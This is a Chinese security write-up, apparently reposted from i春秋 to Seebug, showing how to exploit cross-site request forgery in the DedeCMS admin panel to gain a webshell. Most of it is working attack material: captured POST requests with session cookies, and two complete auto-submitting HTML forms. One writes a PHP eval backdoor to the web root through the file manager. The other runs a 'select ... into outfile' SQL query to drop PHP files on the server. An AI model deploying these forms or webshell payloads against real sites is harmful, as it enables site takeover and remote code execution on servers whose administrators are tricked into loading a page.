來自i春秋作者:Szdny
00x01
ver.txt版本為 20160816
由于X_Al3r提交過補天,所以最新版本已經不能復現,所以我特地問了他要了前一個版本過來寫這篇文章
這里便是Csrf觸發點,我們創建文件的時候抓取他的POST包
POST /uploads/dede/file_manage_control.php HTTP/1.1
Host: 127.0.0.1
Content-Length: 151
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: [url]http://127.0.0.1[/url]
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.108 Safari/537.36 2345Explorer/7.2.0.13379
Content-Type: application/x-www-form-urlencoded
Referer: [url]http://127.0.0.1/uploads/dede/file_manage_view.php?fmdo=newfile&activepath=%2Fuploads%2Fuploads[/url]
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: menuitems=1_1%2C2_1%2C3_1; bdshare_firstime=1472114910255; cookiecheckrlddabd86e58aedecd3956d21fa4aaa637=1473291881; PHPSESSID=nn95rbs56hku1pk8jcp5edatv4; ecisp_seccode=ZjppYlTD796UgoNXLcQlNO4UOI2vudHOBktNZoJu5m8%3D; DedeUserID=1; DedeUserID__ckMd5=db571499870b8384; DedeLoginTime=1473291905; DedeLoginTime__ckMd5=6900164b865d5f29; ENV_GOBACK_URL=%2Fuploads%2Fdede%2Fmedia_main.php%3Fdopost%3Dfilemanager
Connection: close
fmdo=edit&backurl=&activepath=%2Fuploads%2Fuploads&filename=1.php&str=%3C%3Fphp+%40eval%28%24_POST%5B%27x%27%5D%29%3B+%3F%3E&B1=++%E4%BF%9D+%E5%AD%98++上面為包內容 可以看見,他是由
http://127.0.0.1/uploads/dede/file_manage_control.php進行的操作,那么我們構造表單為
file_manage_control.php
觸發的from表單開頭為
<form action="http://127.0.0.1/uploads/dede/file_manage_control.php" method="POST">method=“POST”意思為Post提交 來看第二句
<input type="hidden" name="fmdo" value="edit" />edit已經表示了為編輯 接著第三句
<input type="hidden" name="backurl" value="" />這句可以不用了解,我們來看第四句
<input type="hidden" name="activepath" value="/uploads/uploads" />這里為保存文件的目錄 第五句
<input type="hidden" name="filename" value="1.php" />保存的名字 第六句
<input type="hidden" name="str" value="<?php @eval($_POST['x']); ?>" />這里為文件內容 來看第八句
<input type="submit" value="Submit request" />學過html的人都知道submit為提交,命名為Submit request 那么我們完整的來構造一個表單
<!DOCTYPE html>
<html>
<head>
<script>
function sub(){
document.form1.submit();
}
setTimeout(sub,1);
</script>
</head>
<body>
<form name="form1" action="http://127.0.0.1/uploads/dede/file_manage_control.php" method="POST">
<input type="hidden" name="fmdo" value="edit" />
<input type="hidden" name="backurl" value="" />
<input type="hidden" name="activepath" value="/uploads/uploads" />
<input type="hidden" name="filename" value="1.php" />
<input type="hidden" name="str" value="<?php @eval($_POST['x']); ?>" />
<input type="hidden" name="B1" value="  ??? ?-?  " />
<input type="submit" value="Submit request" />
</form>
</body>
</html><script>
function sub(){
document.form1.submit();
}
setTimeout(sub,1);
</script>這一段為自動提交命名為from1的表單相當于可以直接點開html進行觸發 我們來保存到一個html頁面看看效果
發現點開的時候就提示已經保存了一個文件,并且得到了一個越權
0x02Csrf執行sql語句進行getshell
這里便是第二個觸發點 我們看看他的Post包語句
select"<?php @eval($_POST['x']); ?>" into outfile "D:/WWW/uploads/3.php" ;
執行成功,我們來連接一下看看是否可以連接
可以進行連接,那么我們來分析一下,先從Post包分析
POST /uploads/dede/sys_sql_query.php HTTP/1.1
Host: 127.0.0.1
Content-Length: 163
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: [url]http://127.0.0.1[/url]
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.108 Safari/537.36 2345Explorer/7.2.0.13379
Content-Type: application/x-www-form-urlencoded
Referer: [url]http://127.0.0.1/uploads/dede/sys_sql_query.php[/url]
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: menuitems=1_1%2C2_1%2C3_1; bdshare_firstime=1472114910255; cookiecheckrlddabd86e58aedecd3956d21fa4aaa637=1473291881; PHPSESSID=nn95rbs56hku1pk8jcp5edatv4; ecisp_seccode=ZjppYlTD796UgoNXLcQlNO4UOI2vudHOBktNZoJu5m8%3D; DedeUserID=1; DedeUserID__ckMd5=db571499870b8384; DedeLoginTime=1473291905; DedeLoginTime__ckMd5=6900164b865d5f29; ENV_GOBACK_URL=%2Fuploads%2Fdede%2Fmedia_main.php%3Fdopost%3Dfilemanager
Connection: close
dopost=query&querytype=0&sqlquery=select%22%3C%3Fphp+phpinfo%28%29%3B+%3F%3E%22+into+outfile+%22D%3A%2FWWW%2Fuploads%2F3.php%22+%3B&imageField.x=19&imageField.y=13可以看見,這次是利用
sys_sql_query.php這個文件來進行sql語句 那么我們就可以構造第一句表單
form action="http://127.0.0.1/uploads/dede/sys_sql_query.php" method="POST">還是為post提交 我們來看另外一句關鍵的
<input type="hidden" name="sqlquery" value="select"<?php phpinfo(); ?>" into outfile "D:/WWW/uploads/3.php" ;" />這里便是sql語句的表單(寫了一個phpinfo保存為4.php),其他的基本不變,那么我們來構造一個新的from表單
<!DOCTYPE html>
<html>
<head>
<script>
function sub(){
document.form1.submit();
}
setTimeout(sub,1);
</script>
</head>
<body>
<form name = "form1" action="http://127.0.0.1/uploads/dede/sys_sql_query.php" method="POST">
<input type="hidden" name="dopost" value="query" />
<input type="hidden" name="querytype" value="0" />
<input type="hidden" name="sqlquery" value="select"<?php phpinfo(); ?>" into outfile "D:/WWW/uploads/4.php" ;" />
<input type="hidden" name="imageField.x" value="19" />
<input type="hidden" name="imageField.y" value="13" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
成功執行,我們來訪問一下
成功執行,并且保存。資料:
聲明: 感謝X_Al3r提供的過程與思路與源碼 代替X_Al3r
感謝丁丁提供的思路一,沒有思路一也就沒有了思路二
本文由i春秋學院提供:http://bbs.ichunqiu.com/thread-11581-1-1.html?from=paper
本文由 Seebug Paper 發布,如需轉載請注明來源。本文地址:http://www.bjnorthway.com/41/
暫無評論